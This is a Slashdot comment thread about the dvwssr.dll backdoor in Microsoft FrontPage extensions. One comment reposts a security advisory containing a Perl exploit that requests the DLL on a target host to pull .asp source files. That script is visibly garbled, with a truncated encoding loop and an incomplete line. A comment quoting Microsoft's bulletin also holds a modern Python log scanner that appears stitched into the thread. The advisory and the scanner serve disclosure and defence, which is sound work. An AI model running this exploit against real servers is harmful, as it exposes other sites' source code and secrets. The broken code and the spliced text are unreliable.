      Why was it discovered now? Maybe the recent release of Win 2000 has something to do with it. If I ran a business with NT or '98 this would sure be an incentive for me to buy their new backdoor-free software! Yessire Bob!

      What I find odd is that the article says the perpetrator is as yet unknown. Does MS allow anonymous submissions to its core products? That is truly astonishing.

  212. FP's author.dll is also 'weird' by Otis_INF · · Score: 1
    in the same dir as dvwssr.dll is located, there is a dll named 'author.dll'. This one is a debug version afaik. this is the text I found in that dll (I thought, let's check the others for other funny texts!):

    $Header: /frontpage/server/source/rpctesti/rpctesti.cpp 18 5/28/97 10:55a Jkatzman $ Copyright (c) 1995-1997 Microsoft Corporation fprpctest Fri May 15 12:48:28 1998 Windows/NT
    erm... well... doesn't look like production code to me :) Is this 'Jkatzman' name also a backdoor???? probably.
    --
    --
    Never underestimate the relief of true separation of Religion and State.
  213. Password guess by Adler · · Score: 1

    anyone think the password is "nutscrape" ? just a thought

    --

    Everybody denies I am a genius--but nobody ever called me one!

  214. Hackers by rwade · · Score: 1

    I'm not even really sure on the exact definition of hackers and crackers, but I know what cool people (us) say hackers are, which are like hard core coders and things like that. But cracker is supposed to mean like the kinda person that would exploit this "back-door." Why can't the mainstream say this right?

    1. Re:Hackers by tchuladdiass · · Score: 1
      >Why can't the mainstream say this right

      Because, according to the definition, one meaning of "hack" is a "prank" or practical joke, performed using technical abilities. Since most acts of cracking a system are (historically) done as pranks (defacing a web page, for example), and it requires technical abilities (even for "script kiddies"), these acts can be called "hacks".

      Therefore, a person that performs "hacks" is a "hacker". QED.

  215. Reminds me of... by Hellmongr · · Score: 1

    ...the time I was looking through the file command.com (from Dos 6.22 if I can remember correctly). During my adventure I found some strings containing the names of some food (I think one of them said "apple pie" or something). Just the programmers having some fun I guess, though it's not the most professional way to do things.

    I wonder if there really is a back door or if Microsoft is trying to cover their ass from other companies possibly calling this slander or some such nonsense. Something like this could possibly give the government more ammunition to fire at MS in their ongoing legal battles, pressuring them to open up their code so that further happenings would be prevented.

  216. Re:Backdoors in "secure software" by Grumman_Pilot · · Score: 1

    Actually, my NT domain server has taken to randomly locking out users. It doesn't mark them as locked out, only tells them they are and prevents them from logging in. The fix is just to open their account in the user manager. It is particularly annoying to come in on a Monday and not be able to log into your own domain admin account. (But I AM the system admin, dammit!) Of course, we have a backup, so it's not a terribly big deal but it is annoying to me and my users. So it can happen. (By the way, if anybody knows how to fix this .... aside from a Samba server.... :)

  217. Re:Backdoors in "secure software" by Jump · · Score: 1

    Oh yes, if you can delete such a file you can also create a new one. Once there is a hook you can install a new backdoor anytime.

  218. details by hollebeek · · Score: 1

    rain forest puppy just posted some of the technical details to bugtraq. See www.securityfocus.com.

  219. What I find depressing by fred_the_slow · · Score: 1

    The most depressing thing about this episode is not the back door/easter egg per se, but the lameness of the insult.

    Here's the thing: if the best you can do is call Netscape engineers "weenies," then how ingenious can you really be in the conceiving and placing the back door itself?

    !srehtaerb traf gnikcus elohssa

  220. Now that's professional... by Ron+Harwood · · Score: 1

    While I've never been truly impressed with the professionalism of MS employees, this takes the cake.

    1. Re:Now that's professional... by Bryan+Andersen · · Score: 2

      All code should have code reviews. Where were their code reviews? Who missed this? Did somebody let it go by?

      I'm not surprised so many IIS sites have been hacked. I'm wondering what other gems are in their web server.

      Before you think that this problem doesn't affect you, consider the web sites you frequent and buy from.

    2. Re:Now that's professional... by Ron+Harwood · · Score: 4

      Actually, the more I think about this, the more it irritates me.

      Believe it or not, using Visual Interdev is a pretty standard thing with non-UNIX web-dev shops... and to come along and say - "oh yeah, we screwed this up because it was funny" is just insane. I cannot fathom what the programmers at MS are thinking.

      And to say that "well, it doesn't affect 2000" is no better. I have to ask at that point, "Why? Did you come up with something even funnier for 2000?"

      Eric S. Raymond said just this week that the open source model has one strength that closed source truly lacks, and can never have - peer review. All other "professional" endeavours of this magnitude have it (civil engineering was his example) and those professions are all the better for it.

      If there was even one iota of external peer review, this "feature" (and you can't call something that was placed there on purpose a bug) would never have seen the light of day.

  221. At that point... by Ron+Harwood · · Score: 1

    ...it's no longer a security system, but an easy access system for those in the know.

  222. What surprises lay inside... by Ron+Harwood · · Score: 1

    ...frontpage extensions for UNIX? It's a compiled binary, isn't it?

    It does beg the question of whether or not something like this exists in those extensions as well... which, yes, would affect apache.

  223. Re:Related: A Bug in IIS exposes ASP Source-Code! by zenzizi · · Score: 1

    afaik, you can get just any server script to be shown.. it's not related to asp!.. i think it will even display any file, it's like a hole in a file search system.. i know i tried with coldfusion scripts and it displays just the same. i guess it would work with perl files, php files, you name it.

    --
    /// evilloop.com // la route est plus large que longue /
  224. Next time some Microsurf tells you . . . by hardburn · · Score: 1

    . . . that Linux is insecure because its Open Source and a "hacker" could put a security flaw in it, pull out this article and start to laugh.

    --
    Not a typewriter
    1. Re:Next time some Microsurf tells you . . . by hardburn · · Score: 1

      Sorry, should have been "Microserf."

      --
      Not a typewriter
  225. Re:Not MS policy by Salsaman · · Score: 1
    True, but most software companies have some form of code reviewing procedure in place before releasing any production software, which should catch this kind of silliness.

    Well, most *decent* software shops do anyway ;-)

  226. Re:Affects "almost every Web-hosting provider." by M.+Silver · · Score: 1
    "Web-hosting provider." Not every web server. I think the notion is that web-hosting providers these days tend to have both IIS and Apache servers available. I don't know about "almost every," but at least it seemed to be a "large majority" - if they don't have an IIS server tucked away (or, for the primarily-NT shops, an Apache server) for those who want it, they've usually got another service, sometimes with a different domain name, that offers it.

    --

    Slashdot's token middle-aged housewife
  227. Re:How is a string backwards a backdoor? by HerrGlock · · Score: 1

    ----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------

    "Netscape engineers are weenies!"
    A back door in Microsoft FrontPage extensions

    -------------------------------------
    Alf Serer / alf@at.clientlogic.com - rain forest puppy / rfp@wiretrip.net

    Table of contents:
    -1. The short
    -2. The long
    -3. The code

    --------------------------------------------------------------------------
    "...we love a good conspiracy theory as much as the next person..." - secure@microsoft.com
    --------------------------------------------------------------------------
    UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA
    --------------------------------------------------------------------------

    --[ 1. The short

    The NT 4 Option Pack ships with a particular ISAPI .dll in /_vti_bin/_vti_aut/ named dvwssr.dll, which is mixed in with the Microsoft FrontPage extensions (the version I have is 3.0.2.1105). This particular .dll allows you to read .asp (and .asa) files under the web root, providing you know the 'password' (obfuscated encoding scheme) of which to ask it. And, as implied by the title, the constant key used in the encoding is "Netscape engineers are weenies!".

    I've been told that dvwssr.dll is a component of the NT 4 Option Pack, to be used with InterDev 1.0. Therefore deleting it will affect InterDev 1.0's 'View Links' function. Also, the default permissions don't allow for anonymous users to use the .dll--however, anyone with web authoring can, and I've seen few sites that have allowed permission (which is more due to a misconfiguration on their part). As Microsoft has told me, the immediate problem is moreso the fact that any developer of one particular virtual site can download the .asp code of other virtual sites on the same system.

    --[ 2. The long

    In the fairly recent light of Mr. Cuartango's finding of a backdoor in the authentication of Microsoft installation packages, Microsoft (secure@microsoft.com actually) stated to Bugtraq that the automatic acceptance of Microsoft packages is to "improve our customers' experience while downloading software from Microsoft web sites." Well, so let me relate how Microsoft has included an ISAPI .dll as part of the FrontPage extension package/Option Pack/Visual Interdev, to "improve a hacker's experience while downloading software from your web site".

    I was contacted by Alf Serer (alf@at.clientlogic.com), who indicated to me that dvwssr.dll looked like it was a backdoor, and that it contained the string 'Netscape engineers are weenies!' (although, it's found backwards in the .dll). Being the curious pup that I am, I decided to take a look.

    Using some prior research code attempts at cracking the encoding algorithm (herein referred to as the 'weenie algorithm'), I used a test ISAPI app Alf sent to figure out what the hell this thing was for, and what it is supposed to do. Searches on Microsoft's site said it was to 'verify URLs'. However, I could not find any references to it elsewhere, and even decompilation of the various FrontPage extension applications, FrontPage clients, and Interdev clients yielded no calls or references to dvwssr.dll that I could see; however, I was later told that Interdev 1.0 requires this .dll.

    Microsoft's site had dvwssr.dll down on the manifest for various FrontPage packages/installations. So, taking a peek at the .dll versions, I see that the other ISAPI .dlls that make up the core of FrontPage extensions are of version 3.0.2.1105, while dvwssr.dll is only 1.00.00.2503A. I would think that to mean it was recently introduced into the pack by Microsoft (if you don't know, FrontPage was an original program developed by Vermeer Technologies Inc; hence the _vti_ prefixes.) Granted, maybe it's possible that Vermeer engineers coded dvwssr.dll; but that means, upon acquisition, MS engineers left it in there. You would think some sort of Q&A and/or audit would catch it if it already existed...

    I'm not going to get into the exact details of the weenie encoding algorithm--after all, you have the code below. It's basically a 62 character slide-rule type of encoding.

    Luckily, from my auditing, this is not included with any other versions of FrontPage (including Unix), and in the versions I found it on, ACLs prevented its use (only System and Administrators were allowed full access); I was told by MS that only individuals with web authoring permission can use it, which is more than I had originally thought. But it's not as widespread as, say, RDS. ;)

    Regardless of its actual purpose, or Microsoft's intent, I think the core interesting issue is that Microsoft literally coded (or allowed) a .dll who used a static key such as 'Netscape engineers are weenies!'.

    In any event, if you don't use Interdev 1.0, you can delete the file and call it a day. If you do use Interdev 1.0, well, it's your call, but I suggest an upgrade.

    --[ 3. The code

    #!/usr/bin/perl
    # dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
    #
    # Usage: dvwssr.pl target_host /file/to/retrieve/source
    #
    use Socket;
    $ip=$ARGV[0];
    $file=$ARGV[1];
    print "Encoding to: ".encodefilename($file)."\n";
    $url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file)." HTTP/1.0\n\n";
    print sendraw($url);
    sub encodefilename {
    my $from=shift;
    my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    #
    #
    my $key="Netscape engineers are weenies!";
    #
    #
    my $kc=length($from);
    my ($fv,$kv,$tmp,$to,$lett);
    @letts=split(//,$from);
    foreach $lett (@letts){
    $fv=index $slide, $lett;
    $fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
    $kv=index $slide, substr $key, $kc, 1;
    if($kv>=0 && $fv>=0){
    $tmp= $kv - $fv;
    if($tmp = length($key)){ $kc=0;}
    }return $to;}
    sub sendraw {
    my ($pstr)=@_;
    my $target;
    $target= inet_aton($ip) || die("inet_aton problems");
    socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,80,$target)){ select(S);
    $|=1;
    print $pstr;
    my @in=;
    select(STDOUT);
    close(S);
    return @in;
    } else { die("Can't connect...\n"); }}

    --[ 4. The End

    I know this is short and not with its usual flair. I apologize...I have been running around like mad, and basically don't have the time or energy to expend into this. :/

    - rain forest puppy

    Special thanks to Alf Serer, the founder of this bug; also, special thanks to attrition.org (especially McIntyre) for helping me wrangle this.

    I'm currently in the UK, so if you have immediate questions, I suggest you send an email to Alf or the Attrition staff (staff@attrition.org).

    Catch me, along with Fyodor, Ron Gula, Ken Williams, Theo DeRaadt, Mary Roesch, and others, at CanSecWest, May 10-12 in Vancouver, Canada. More info at www.dursec.com.

    -------------------------------------
    Alf Serer / alf@at.clientlogic.com - rain forest puppy / rfp@wiretrip.net

    Regardless if Netscape engineers are weenies, Microsoft engineers are definitely pompous

    ----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------

    --
    Cav Pilot's Reference Page
    UNIX - Not just for Vestal Virgins anymore
  228. Countries other than US using MS for security stuf by HerrGlock · · Score: 1

    Does anyone still think the Brits are paranoid for not trusting closed source software developed in another country for use in their classified networks?

    I have no idea if this particular news item is true or not but the idea is there now and I wonder how many other "must be secure" type systems will think twice about closed source. If it was not developed by the country requiring the security and/or was not open source and downloaded and built by that country, how do they know what types of backdoors are in the software?

    --
    Cav Pilot's Reference Page
    UNIX - Not just for Vestal Virgins anymore
  229. Are you sures? by www.sorehands.com · · Score: 1
    Are you sure that they are referring to Netscape people as weenies, or are they talking about themselves?

    It seems funny that people working for Bill Gates would be using the word weenie.

  230. Re:Heaven's Gift? -- Nope by Moneo · · Score: 1

    Re:Heaven's Gift? -- Nope (Score:3) by Hrunting (hrunting@nospam.texas.net) on Friday April 14, @07:40AM EST (#180) http://hrunting.home.texas.net/

    This is a quote from the leading online gaming source, Blue's News.

    There are scary implications here. When you cannot trust software made by one of the world's largest software companies, what do you do when if[sic] comes to all the little homebrew progams that are available?

    This is exactly the mentality that keeps open-source from advancing. As strange as it may seem, the corporate world does not see open-source software go through the same sort of rigorous QA that (they assume) corporate products go through. An event such as this is only going to serve to make people doubt more software in general and that has a negative effect on open-source software which already has to face the FUD about its quality.

    No, this isn't Heaven's Gift, it's Satan's Blessing. Too many people see Microsoft as the sort of God of software and when your God fails you, where do you turn? Certainly not to the meek.

    Why not? They're supposed to inherit the Earth, neh?

  231. Re: NT already has suitable Backdoors by iang · · Score: 1
    "Say due to some "bug" in the software, you get locked out of your mission critical system. How do you get back in? "

    As others have already pointed out, such a backdoor should only be of any use to someone who has physical access to the machine. The implication of this article is that it is available to remote users which is highly dangerous.

    NT already can be unlocked if you've managed to lock yourself out, so long as you have physical access. Go to http://www.sysinternals.com/ and check out their NT utilities page, looking for a thing called 'Locksmith'. This lets you create a boot floppy which will reset the password on the account of your choice.

    It caused a stir at the time, but of course if you can boot the machine from a floppy, then you can reset passwords. If the OS on the hard disk can change a password then so can any other OS that can get access to the hard disk. Just like I can come along with a Linux boot disk, mount your hard disk and edit your password file to get root access...

    --
    Ian Griffiths
  232. Re:Taking a bomb on a plane by JonesBoy · · Score: 1

    Hey cool! Next time I program I will put a whole bunch of easy syntax errors at the beginning so I won't have any errors in the rest of the code. Hmmm. If MS has been practicing this for a while I think I know why they have so many problems....

    --
    Speeding never killed anyone. Stopping did.
  233. Re:Not MS policy by subsolar2 · · Score: 1
    Microsoft has acknowledged one "feature" with active directory on W2K. An administrator in any part of the directory for that domain can become an admin for the whole domain!!

    So if you have an admin for Human Resources department, and an admin for Sales, the sales admin can get full access to files in the HR part of the tree! Fine for me I would not mind seeing what everybody earns!!!. Microsoft originally said this was a bug, but then said "Well if you lose your main admin, another can take his place".

    Under Novell this type of security breach would be considered very bad. Most organizations usually set up an admin account and put the login & password in a locked box in case you lose your admin, and only authorized & trusted individuals have access to the safety account.

    SubSolar

  234. Lordy lordy... by Rico_Suave · · Score: 1
    MS coders poking fun at the competition - like this hasn't been done by EVERY developer at one time or another... Go back and look at Ultima III by Origin - a pirate is known as PIRT SNIKWAH - (Trip Hawkins - pres. of EA at the time and a competitor). I didn't see anyone getting their panties in a knot over that. Lighten up. It's just not that big of a deal.

    --

  235. Re:Down right criminal... by aclaudet · · Score: 1

    Ponder this: Would you accept a security system for your house if you knew it could be bypassed by anybody with a standard code?

    You don't think the manufacturer of your security system has codes to bypass your code?

  236. Original WSJ article via ZDNet by fooyen · · Score: 1

    I didn't see this posted already, so here goes:

    ZDNet has a copy of the original WSJ Interactive article at http://www.zdnet.com/zdnn/stories/news/0,4586,2543490,00.html. It's much better than the anemic AP and CBS reports.

  237. Re:First time for nothing. by Alexius · · Score: 1

    Actually, That Makes Sense, It Explains How "Support" Software like PC Anywhere And NetOp Work So Well (And How Programs Like NetBus And Back Orifice Were So Easily Created). My guess Is That There Is A Bug In It Though That Would Prevent The CIA From Taking Advantage Of It Anonymously.

    --
    `Lex - Find Me Here: Text Appeal
  238. Microsoft prisoners by cyber-vandal · · Score: 1

    With a company with a long history of security flaws, should those of you living in Washington state be worried about Microsoft using prison labour. What's it going to be, 'no bars on the windows for this guy, he's Microsoft?'

  239. Hey, Does this mean I can delete all my .dlls? by ivan37 · · Score: 1

    Just taking a quick look, I have over 450MB of Microsoft .dlls. Does this mean now that I can delete them all...I could definitely use the space. Hey, and as a little aftereffect, I won't have to worry about new backdoors! What a deal!

  240. Re:So what does the file do then? by Fishstick · · Score: 1

    >!pu dekcuf sreenigne tfosorciM

    cool .sig - wish I thought of it first!

    !skcits-kcuf tnagorra era sreenigne tfosorciM

    --

    There is much cruelty in the universe, John.
    Yeah, we seem to have the tour map.

  241. Re:Heaven's Gift? -- Nope by Fishstick · · Score: 1

    >This is a quote from the leading online gaming source, Blue's News.

    Looks like he's taken that editorial bit off of his site. I went to post a comment on his discussion board (http://www.bluesnews.com/cgi-bin/blammo.pl?mode=mboard&action=viewboard&id=12236&format=main) about it and looks like he got a couple comments about it. No doubt a few people mailed him about it as well.

    Heaslip seems to be a pretty good guy about stuff like this. I expect to see a blurb about it in his "out of the Blue" ramble tomorrow. He generally owns up to mis-statements or foibles like this.

    --

    There is much cruelty in the universe, John.
    Yeah, we seem to have the tour map.

  242. Red Hat cannot do this by e_n_d_o · · Score: 1

    YOU SAY: Nothing really prevents a Red Hat engineer from doing something equally stupid.

    Ever heard of source RPMS? You can compile a source RPM using Red Hat's exact same settings and you should get a just about byte-for-byte duplicate version.

    1. Re:Red Hat cannot do this by hey! · · Score: 2

      Ever heard of source RPMS?

      Sure, and I read every line of code in every SRPM I install, just like you do ;-)

      --
      Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
  243. problem with terminology by logistix · · Score: 1

    Here's my problem.

    If you were really going to install a super-secret backdoor that no-one knew about, why would you call netscape engineers 'weenies'?

    I personally would pick a much more obscene term, wouldn't you?

    Why did these guys show restraint? Makes you think...

    --
    - My password is slashdot
  244. Your point being? by gms · · Score: 1

    Backdoor in Microsoft Web Software

    This is news why? Isn't this just assumed at this point?

    estimated that the problem threatened "almost every Web-hosting provider." [...]

    This is true how? Oh, right, IIS for Linux and BSD's.

  245. Re:Looks like there never was a backdoor (read bel by gilroy · · Score: 1
    Quoth Zico, first quoting someone else (whose post I can't see):
    All bold is the mark of the troll.
    Well, I guess it's appropriate then -- hell, people around here just see my name and immediately start marking down my posts as "trolls" anyway! ;-)
    I can't speak to the latter, but I can't see how a pre-declared bold font makes one a troll. Actually, an all-bold post is more the mark of someone who misses the point of bold: to call attention to a piece of text. By filling my entire screen with bold font, you just remove the emphasis you were hoping to add. Indeed, unbolded text becomes the highlighted part then. :)
  246. That's what #ifdef _DEBUG is for by Dhericean · · Score: 1

    In an ideal world the programmer would create separate debug and ship versions of the software. Pieces of code for development hacks like this would all be conditional on _DEBUG being defined. So when the final version is compiled (without _DEBUG defined) they are not in the resulting binaries.

    This does require more careful coding and regular checking of the release version. However there are a number of other advantages including use of Assert and the ability to perform extra checking in critical subsystems during development without taking the hit for these in the ship version.

    There is a good description of this kind of programming in "Writing Solid Code" by Steve Maguire (1993). Available from all your favourite on-line computer bookstores. Don't write it off because it's Microsoft Press; it's by one of their old school programmers (back before they started seriously taking over the world).

    --

    Gamma Testing - Where testing is extended to the full user community (AKA Shipping the Program)
  247. Removal Adds Bugs by Dhericean · · Score: 1

    Unless the code has been carefully written with removal in mind, or the program is thoroughly tested after the removal, there is a good chance that the removal of the cheat code logic will introduce problems. It may do so anyway but if the cheat logic were properly written as debug code then the chance of this is low.

    --

    Gamma Testing - Where testing is extended to the full user community (AKA Shipping the Program)
  248. Re:So what does the file do then? by InS0MnIaC · · Score: 1

    The FrontPage Extensions manage design-time web permissions ...

    Interesting that something cut-and-pasted from MSDN (without a citation) gets modded to a 5...

  249. From MS by invispace · · Score: 1

    To all who care below is the security bulletin from MS. Also, "Netscape Engineers are weenies," is not a password and does not work without the correct Key.

    The following is a Security Bulletin from the Microsoft Product Security Notification Service.

    Please do not reply to this message, as it was sent from an unattended mailbox.
    ********************************

    -----BEGIN PGP SIGNED MESSAGE-----

    Microsoft Security Bulletin (MS00-025)
    - --------------------------------------

    Procedure Available to Eliminate "Link View Server-Side Component" Vulnerability

    Originally Posted: April 14, 2000

    Summary
    =======
    A procedure is available to eliminate a security vulnerability in several web server products. The vulnerability could allow a user who has privileges on a web server to read certain files from other web sites hosted on the same computer.

    Frequently asked questions regarding this vulnerability and the procedure can be found at http://www.microsoft.com/technet/security/bulletin/fq00-025.asp

    Issue
    =====
    Dvwssr.dll is a server-side component used to support the Link View feature in Visual Interdev 1.0. By design, it provides .asp files to clients who have web authoring privileges on the server. However, it does not properly restrict the files that a web author can request, with the result that a user who has web authoring privileges on one web site could request .asp files from anywhere on the server, including other web sites hosted on it. However, even with this vulnerability, the component would only comply with the request if the specific file granted read access to the user.

    There are some significant restrictions to this vulnerability:
    - Only servers hosting multiple web sites could be affected by it
    - Only a user who has web authoring privileges for a site on the server could request a file. He would need to know the name and location of the file on the server.
    - The files would only be sent if their permissions granted read access to the particular user who requested them. In most cases, this would mean that the files granted read access to the Everyone group
    - Only .asp files (and global.asa, which is a special-case .asp file) could be retrieved.

    Affected Software Versions
    ==========================
    The affected component is part of Visual Interdev 1.0. However, it is a server-side component, and is included in the following products:
    - Windows NT 4.0 Option Pack
    - Personal Web Server 4.0, which ships as part of Windows 95 and 98
    - Front Page 98 Server Extensions

    NOTE:
    1. Windows 2000 is not affected by this vulnerability. Upgrading from an affected Windows NT 4.0 to Windows 2000 removes the vulnerability.
    2. Installing Office 2000 Server Extensions on an affected server removes this vulnerability.
    3. Installing FrontPage 2000 Server Extensions on an affected server removes this vulnerability.

    Remediation
    ===========
    To eliminate this vulnerability, customers who are hosting web sites should delete all copies of the file Dvwssr.dll from their servers. The FAQ provides step-by-step instructions for doing this. The only functionality lost by deleting the file is the ability to generate link views using Visual Interdev 1.0.

    --
    -- -- A truly great man never puts away the simplicity of a child
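
    The bulletin quoted in the comment above tells hosts to delete Dvwssr.dll; an administrator will also want to know whether the component was ever requested and by whom. The following is an added example, not part of the original post or of Microsoft's bulletin: it scans W3C extended-format web server logs for requests whose path names dvwssr.dll. The sample log lines, addresses and user names are constructed, and it assumes the log records the cs-uri-stem field.

```python
"""Find requests for dvwssr.dll in W3C extended-format web server logs."""
from collections import namedtuple
from urllib.parse import unquote

TARGET = "dvwssr.dll"

Hit = namedtuple("Hit", "line_no date time client user stem query status")

# Constructed sample log (documentation-range addresses, made-up user names).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2000-04-14 09:00:00
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
2000-04-14 09:00:01 192.0.2.10 - GET /default.asp - 200
2000-04-14 09:00:05 192.0.2.44 SITE1\author1 GET /_vti_bin/_vti_aut/dvwssr.dll AAAA 200
2000-04-14 09:00:09 192.0.2.44 - GET /_VTI_BIN/_vti_aut/DVWSSR.DLL BBBB 401
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2000-04-14 09:01:00 198.51.100.7 GET /_vti_bin/_vti_aut/dvwssr%2Edll 404
2000-04-14 09:01:02 198.51.100.7 GET /images/logo.gif 200
"""


def targets_component(stem):
    """True if any segment of the URL path is dvwssr.dll.

    Matching is case-insensitive, percent-decoding is applied first, and a
    trailing path after the DLL name (/dvwssr.dll/extra) still counts.
    """
    path = unquote(stem).replace("\\", "/")
    return TARGET in (segment.lower() for segment in path.split("/"))


def find_dvwssr_requests(lines):
    """Return a Hit for every log record that requests the component."""
    fields, hits = [], []
    for line_no, raw in enumerate(lines, start=1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            # A "#Fields:" directive may reappear mid-file with a new layout.
            if line.lower().startswith("#fields:"):
                fields = line.split(":", 1)[1].split()
            continue
        values = line.split()
        if not fields or len(values) != len(fields):
            continue  # cannot be interpreted against the current layout
        rec = dict(zip(fields, values))
        stem = rec.get("cs-uri-stem", "")
        if not targets_component(stem):
            continue
        hits.append(Hit(
            line_no,
            rec.get("date", "-"),
            rec.get("time", "-"),
            rec.get("c-ip", "-"),
            rec.get("cs-username", "-"),
            stem,
            rec.get("cs-uri-query", "-"),
            rec.get("sc-status", "-"),
        ))
    return hits


def summarize(hits):
    """Per client: request count, 2xx answers, and authenticated users seen."""
    summary = {}
    for hit in hits:
        entry = summary.setdefault(
            hit.client, {"requests": 0, "served": 0, "users": set()})
        entry["requests"] += 1
        if hit.status.startswith("2"):
            entry["served"] += 1  # the server answered; review these first
        if hit.user != "-":
            entry["users"].add(hit.user)
    return summary


if __name__ == "__main__":
    found = find_dvwssr_requests(SAMPLE_LOG.splitlines())
    for hit in found:
        print(hit.line_no, hit.date, hit.time, hit.client, hit.user, hit.status)
    for client, entry in summarize(found).items():
        print(client, entry["requests"], entry["served"], sorted(entry["users"]))
```

    Requests answered with a 2xx status by an authenticated user are the ones to review first, since the bulletin says the component only serves clients that hold web authoring privileges.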
  250. Re:Actual report - not as bad as it looked by slycer · · Score: 1

    I tried it, secure internal server, didn't work.
    According to ntbugtraq, a lot of sites that are misconfigured might work..

  251. M$ Programmers by LoneCoder · · Score: 1

    Hmm, all this kinda makes you wonder what sort of mindset those Microserfs working for Micro$oft are in. Calling fellow workers "weenies" isn't very polite, is it?

    --
    "Some people see things as they are, and ask why. I dream things that never were, and ask why not."
  252. PS before you flame me too much by Pinball+Wizard · · Score: 1

    Disclaimer: I also run a 64-user AIX box! And a couple of Linux systems, one that's getting ready to run my own customized version of slash. I actually know something about computers! So just because I run an NT box does not mean I'm one of those "Minesweeper Consultants and Solitaire Experts"

    --

    No, Thursday's out. How about never - is never good for you?

  253. Re:thank you /. for providing info MS should have by Pinball+Wizard · · Score: 1
    Well, I actually do need good database performance - need to run fast queries against a 700,000 row table in SQL Server. I'm using transactions and replication so I can't just move it to mySQL (easily). I'm hoping to increase the number of hits too :)

    But I think I agree with you there about Apache. I'm thinking move to Apache, keep NT/SQL server just as the backend database. Apache, Sendmail & SQL Server just might be the best of breed solution I'm looking for, and I wouldn't have to worry as much about NT's security flaws since it wouldn't be running the website, and the only permissions on the database would be those given to Apache. Comments and suggestions welcome.

    --

    No, Thursday's out. How about never - is never good for you?

  254. thank you /. for providing info MS should have by Pinball+Wizard · · Score: 1
    aaaargh! Why do I have to read about this shit in /. Microsoft should have emailed their customers about this immediately. It's not even on their site. Thank you /.ers who posted relevant links. Luckily I wasn't affected, this time. This particular security hole does not let anyone in, just if you already have developer permissions on the server. So, for instance, if you have an ISP running IIS, you might have to worry about certain web developers accessing other sites on your box.

    This is the 2nd time I've had to fix a security flaw where the information was documented and a fix was posted on the web some time before MS got a clue.

    Ya know, I'm probably one of the few that actually bought something from MS because I thought it was worth it. SQL and IIS performance wise really kick ass, and I'll be happy to provide some relevant links if you want to question this. NT is not 100% stable for me, but I have uptimes in the 3 month range with about 35,000 hits a day on my site. Crap like this, however, is rapidly making me a former customer of Microsoft.

    --

    No, Thursday's out. How about never - is never good for you?

  255. Another reason for Open Source by greyspacealien · · Score: 1

    I suppose that if this were Open Source, a backdoor like this would never have existed.
    It seems as though one of these deliberately placed "major mistakes" happens to Microsoft every few months. I suppose that shows to the quality of their engineers.
    I would also assert that this is not so surprising. After all there is one huge security hole that Microsoft will have a very hard time patching, it is a problem with every version of Microsoft Web Server, it is called Windows.

  256. Re:IE 5.0 _does_ have a real easter egg! by shippo · · Score: 1

    Doesn't work in the English version. However this install is a bit broken in that Windows update comes up as a blank screen.

  257. Re:Backdoors in "secure software" by logicnazi · · Score: 1

    Even if I grant your point then the back door should be stored as a properly hashed password and thus not derivable from any decompile.

    --

    If you liked this thought maybe you would find my blog nice too:

  258. Re:Down right criminal...Corrected by B-B · · Score: 1

    The more I think about this, (1) the more I feel it is down right criminal to stick a backdoor like this into code. This can lead to massive problems for both individuals and businesses that have data stolen (2). Look at the trouble that (3) caused (4) the credit card companies with (5) credit card number lists stolen (6) from their (7) web servers. Add on top of this, (8)(9) there were (10) fraudulent charges to people's (11) credit cards. Deliberate backdoors like this and others make it all that much easier for a cracker or script kiddie (12) to break into a system. Who knows whether (13) this was the exploit used in any of the previous security breaches. I'd bet that some used it; (14) maybe (15) not all, but some.

    Ponder this: Would you accept a security system for your house if you knew it could be bypassed by anybody with a standard code?

    Corrections made by the grammar police. Fifteen errors in so short a post. Well, my work is done!

    --
    Reality does not happen until you analyze the dots. -Don DeLillo (Underworld)
  259. Forced Upgrades?? by Ransom342 · · Score: 1

    If this only doesn't affect FP2000, WIN2000, I wonder what sort of impact this will have on FP98 users?

    It is interesting that this news comes out AFTER the newer product lines are available. Time to Pick up the Lagging Sales of Windows 2000 with a good media scare? I guess we will have to wait and see....

  260. Re:I know the phrase... by Spudley · · Score: 1

    There's quite a lot more than just the password and global.asa in the file....

    --
    (Spudley Strikes Again!)
  261. Reference??? by peul · · Score: 1

    Did anyone find a reference to this vulnerability on the MS site?

  262. Weenies by DjDanny · · Score: 1

    This DLL sits in one of the Frontpage server extensions folders so you would have to assume it's something to do with Frontpage.
    If you scroll through the DLL a bit further, you get some stuff about it being part of "Microsoft Design Tool", whatever that is.
    Anyway, everybody knew the Frontpage server extensions were completely insecure.

  263. Re:Another nail in closed source software's coffin by sqlrob · · Score: 1
    Yes, this indicates that closed source is insecure.

    However, it does not indicate that open source is secure

    It does make it more difficult to put backdoors in ala this MS hole, but it certainly does not make it impossible. A lot (all?) of the cryptographic routines require magic numbers. A back door could be hidden through the algorithm and these numbers. Unless someone is going to run a detailed cryptanalysis on the algorithm with the supplied numbers, there could very well be a backdoor or the encryption is a LOT weaker than it would otherwise be.

  264. Its Microsoft so it must be good? by NinjaBill · · Score: 1

    Many companies will deploy Microsoft Software, especially non technical companies, without even considering alternatives, because being Microsoft, it must be good, and a high price and unreliability of the software can be overlooked because this Microsoft software, being so expensive must have the best security/features/usability/speed. Perhaps in light of this, people will start looking for substance rather than marketing hype, and once people start looking for substance, Microsoft software may no longer look like the most attractive option.

  265. As for the password...... by |Soc| · · Score: 1

    IF you can't beat the hell outta them Call them weenies.... To think, a large company like MS and they can't think of a better insult than weenies.... tis a sad day..

    1. Re:As for the password...... by radja · · Score: 2

      pfft.. they probably were cleverer than calling people weenies.. but MS forced them to change it into something non-offensive...

      //rdj

      --

      No one can understand the truth until he drinks of coffee's frothy goodness.
      --Sheikh Abd-Al-Kadir, 1587
  266. Re:actually... by binarytoaster · · Score: 1

    Let's just AND it with a bunch of ones, and make it completely uncrackable!

